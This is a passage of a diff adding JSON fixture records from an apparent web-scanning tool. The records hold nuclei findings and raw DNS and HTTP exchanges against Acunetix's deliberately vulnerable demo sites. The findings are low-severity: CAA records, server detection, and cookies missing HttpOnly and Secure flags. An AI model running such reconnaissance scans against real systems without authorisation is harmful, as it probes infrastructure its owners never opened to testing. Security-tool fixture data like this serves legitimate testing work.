"['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.400Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 3184\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 3184\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 51, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.502Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 35146\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 35146\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 52, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.617Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 5487\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 5487\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testasp.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1800\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 53, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at", + "discovered_date": "2024-11-13T02:34:38.716Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:105at HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 54, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.812Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 42777\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 42777\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86397\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 55, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:38.936Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 15573\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 15573\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86397\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 56, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.067Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 15116\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 15116\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86399\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 57, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.243Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 1707\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 1707\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 1232\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t86399\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 58, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.366Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 11520\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 11520\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1798\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 59, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.480Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 22604\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 22604\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1798\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 60, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "dns/caa-fingerprint.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/caa-fingerprint", + "template_id": "caa-fingerprint", + "matcher_name": "", + "name": "CAA Record", + "severity": 0, + "description": "A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": null, + "type": "dns", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.598Z", + "open_status": true, + "hackerone_report_id": null, + "request": ";; opcode: QUERY, status: NOERROR, id: 47956\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 4096\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n", + "response": ";; opcode: QUERY, status: NOERROR, id: 47956\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\n\n;; OPT PSEUDOSECTION:\n; EDNS: version 0; flags:; udp: 512\n\n;; QUESTION SECTION:\n;testhtml5.vulnweb.com.\tIN\t CAA\n\n;; AUTHORITY SECTION:\nvulnweb.com.\t1798\tIN\tSOA\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\n", + "is_llm_used": false, + "tags": [ + 1, + 2 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 61, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/cookies-without-httponly.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/cookies-without-httponly", + "template_id": "cookies-without-httponly", + "matcher_name": "", + "name": "Cookies without HttpOnly attribute - Detect", + "severity": 0, + "description": "Checks whether cookies in the HTTP response contain the HttpOnly attribute. If the HttpOnly flag is set, it means that the cookie is HTTP-only\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://owasp.org/www-community/HttpOnly']", + "cvss_metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.692Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 7, + 8, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 62, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/cookies-without-secure.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/cookies-without-secure", + "template_id": "cookies-without-secure", + "matcher_name": "", + "name": "Cookies without Secure attribute - Detect", + "severity": 0, + "description": "Checks whether cookies in the HTTP response contain the Secure attribute. If the Secure flag is set, it means that the cookie can only be transmitted over HTTPS\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://owasp.org/www-community/controls/SecureCookieAttribute']", + "cvss_metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:39.865Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.0) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/9.1.2 Safari/602.1.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:34:32 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=IAFOKMIBEGJADIFBBNBAOKMB; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory 